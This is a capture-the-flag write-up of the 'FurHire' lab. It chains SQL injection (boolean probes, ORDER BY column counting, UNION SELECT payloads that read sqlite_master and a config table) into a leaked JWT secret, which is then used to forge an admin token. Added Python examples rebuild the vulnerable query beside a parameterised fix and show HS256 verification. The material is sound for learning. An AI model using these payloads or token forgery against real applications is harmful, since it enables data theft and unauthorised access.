FurHire - SQLi - JWT
FurHire is back, this time with a chaining opportunity.
After creating two users, one for hiring and one for job hunting, I noticed that the job listing had an id inside the URL, so I checked whether that endpoint was vulnerable to IDOR or SQLi. I got a hit on SQLi: the payload AND 1=1-- returned the same value, but AND 1=2-- returned nothing. The application was evaluating my input as part of the query, so SQLi was possible.


Then I tried a UNION SELECT null,null,... attack, but that returned nothing. I went up to 20 nulls, because a valid response returned 17 values and I knew the column count could be that high, but nothing worked. Then I turned to SQLMap, but that would not work for some reason. So I guessed it was time to read a bit.
After I solved the lab, I revisited the SQLMap problem and discovered I should have used the flag --force-ssl: for some odd reason, SQLMap tried to use HTTP for a redirect.
I discovered an attack method where you use ORDER BY 1-- and increment the number. The last number that still works is the number of columns you need in your UNION SELECT statement.

So in this case, I would need a UNION SELECT with 16 values.
I also read that null can cause unexpected behavior in some cases, so I tried UNION SELECT 1,2,3,...,16 instead.

Alright, that worked! In the past, a flag was the admin's password, so I tried to find it with SELECT 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16 from users where username ='admin' --, but that gave the same result as without the payload, so there was no admin user to extract data from.
Then I tried to figure out which other tables might contain interesting information. With the payload UNION SELECT 1,2,3,group_concat(name, ', '),5,6,7,8,9,10,11,12,13,14,15,16 from sqlite_master WHERE type='table' I could list the tables and see which ones looked interesting.

Why not see what is hidden in a table called 'config'? With the payload UNION SELECT 1,2,3,sql,5,6,7,8,9,10,11,12,13,14,15,16 from sqlite_master WHERE name='config'-- I could see the structure of the 'config' table.

I was most interested in the key and value columns, so I read the first entry with the payload UNION SELECT 1,2,3,key,value,6,7,8,9,10,11,12,13,14,15,16 from config--
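To make the root cause concrete, here is an added example (not code from the write-up or from FurHire) that rebuilds the situation above in an in-memory SQLite database: a job lookup that returns 16 columns, and a config table that stores the JWT secret next to ordinary application data. The schema, the column names and the placeholder secret are my assumptions. The vulnerable lookup pastes the URL parameter into the query text, so the boolean probe, the ORDER BY column-count oracle and the UNION read all behave exactly as described; the parameterised lookup binds the same input as a value, and every one of those inputs simply returns no rows.

```python
import sqlite3
from typing import List, Optional, Tuple

# Constructed in-memory schema that mirrors the lab: a job listing whose lookup
# returns 16 columns, and a config table that (unwisely) stores the JWT secret.
SECRET_PLACEHOLDER = "EXAMPLE_SECRET_PLACEHOLDER"   # stand-in, not the lab's value

# The write-up's extraction payload, minus the trailing comment (nothing follows it here).
UNION_PAYLOAD = "0 UNION SELECT 1,2,3,key,value,6,7,8,9,10,11,12,13,14,15,16 FROM config"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    extra = ", ".join(f"c{i} TEXT" for i in range(2, 17))           # c2 .. c16
    conn.execute(f"CREATE TABLE jobs (id INTEGER PRIMARY KEY, {extra})")
    conn.execute("CREATE TABLE config (key TEXT, value TEXT)")
    conn.execute("INSERT INTO config VALUES ('jwt_secret', ?)", (SECRET_PLACEHOLDER,))
    values = ", ".join(f"'job-{i}'" for i in range(2, 17))
    conn.execute(f"INSERT INTO jobs VALUES (1, {values})")
    conn.commit()
    return conn


def job_lookup_vulnerable(conn: sqlite3.Connection, job_id: str) -> Optional[List[Tuple]]:
    """Deliberately broken, as in the lab: the URL parameter is pasted into the SQL text.
    Returns None on a SQL error, which is exactly the oracle that ORDER BY probing relies on."""
    try:
        return conn.execute(f"SELECT * FROM jobs WHERE id = {job_id}").fetchall()
    except sqlite3.OperationalError:
        return None


def job_lookup_safe(conn: sqlite3.Connection, job_id: str) -> List[Tuple]:
    """Parameterised: the driver binds job_id as a value, so it can never become SQL."""
    return conn.execute("SELECT * FROM jobs WHERE id = ?", (job_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    for probe in ("1", "1 AND 1=2", "1 ORDER BY 16", "1 ORDER BY 17", UNION_PAYLOAD):
        print("input:     ", probe)
        print("vulnerable:", job_lookup_vulnerable(db, probe))
        print("safe:      ", job_lookup_safe(db, probe))
```

Two things worth noticing when you run it: ORDER BY 17 is the only probe that makes the vulnerable lookup error out, which is why the technique lands on 16, and the safe lookup never errors, never changes shape and never touches config, because the whole input is compared against the id column as a single (non-numeric) text value. The second, independent fix is not to keep a signing secret in a table the application can query at all.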

Apparently, the jwt_secret is phonesCheeseTiramisu1199 🥳
But what to do with it? None of the endpoints I had encountered so far returned a 403 that would encourage me to re-sign my JWT, so I decided to fuzz for endpoints.

I got a 200 on /admin, but when I navigated there I got an access denied because my current role was user, so let's update that token.

So I updated the claims in my JWT and re-signed it with phonesCheeseTiramisu1199.

I took the re-signed token, navigated to /admin, placed the JWT inside my local storage and refreshed the page.

And like that, I found the flag 🇧🇪
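The /admin check only holds as long as the signing secret stays secret, which is why the config table leak was enough. Here is an added example (not the lab's code) of what a minimal HS256 verifier and role gate look like with only the Python standard library; the claim names, the placeholder secret and the `admin_allowed` gate are my assumptions. It shows the three outcomes from this write-up side by side: a legitimately issued user token is rejected at /admin, a token re-signed with a guessed secret is rejected because the HMAC does not match, and a token re-signed with the real secret is indistinguishable from a genuine one until the secret is rotated.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Server-side signing secret. In a sound design this comes from the environment or a
# secret manager, never from a table the application's own queries can reach.
# Constructed placeholder value for this example.
SERVER_SECRET = "example-server-secret"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(claims: dict, secret: str) -> str:
    """Standard HS256 compact JWS. The server uses this to issue tokens; once the
    secret leaks, so can anyone else, which is the whole point of the write-up."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_token(token: str, secret: str) -> Optional[dict]:
    """Return the claims if the signature checks out under `secret`, otherwise None."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        # Pin the algorithm server-side; never let the token's header choose it.
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None
        expected = hmac.new(secret.encode(), f"{header_b64}.{body_b64}".encode(),
                            hashlib.sha256).digest()
        # Constant-time comparison so the check itself leaks nothing about the MAC.
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        claims = json.loads(_b64url_decode(body_b64))
        return claims if isinstance(claims, dict) else None
    except ValueError:   # wrong number of parts, bad base64, bad JSON, bad UTF-8
        return None


def admin_allowed(token: str, secret: str) -> bool:
    """The /admin gate: a valid signature AND role == admin. Nothing else is consulted."""
    claims = verify_token(token, secret)
    return claims is not None and claims.get("role") == "admin"


if __name__ == "__main__":
    issued = mint_token({"sub": "alice", "role": "user"}, SERVER_SECRET)
    print("issued user token at /admin:        ", admin_allowed(issued, SERVER_SECRET))
    guessed = mint_token({"sub": "alice", "role": "admin"}, "not-the-secret")
    print("re-signed with a guessed secret:    ", admin_allowed(guessed, SERVER_SECRET))
    leaked = mint_token({"sub": "alice", "role": "admin"}, SERVER_SECRET)
    print("re-signed with the leaked secret:   ", admin_allowed(leaked, SERVER_SECRET))
    print("same token after secret rotation:   ", admin_allowed(leaked, "rotated-secret"))
```

The verifier is not at fault here; the gate does exactly what it should. The defensive lessons are upstream of it: keep the secret out of the application database (so a SQLi cannot chain into authentication), and treat a suspected leak as a rotation event, since rotation is the only thing that invalidates tokens someone else has already minted.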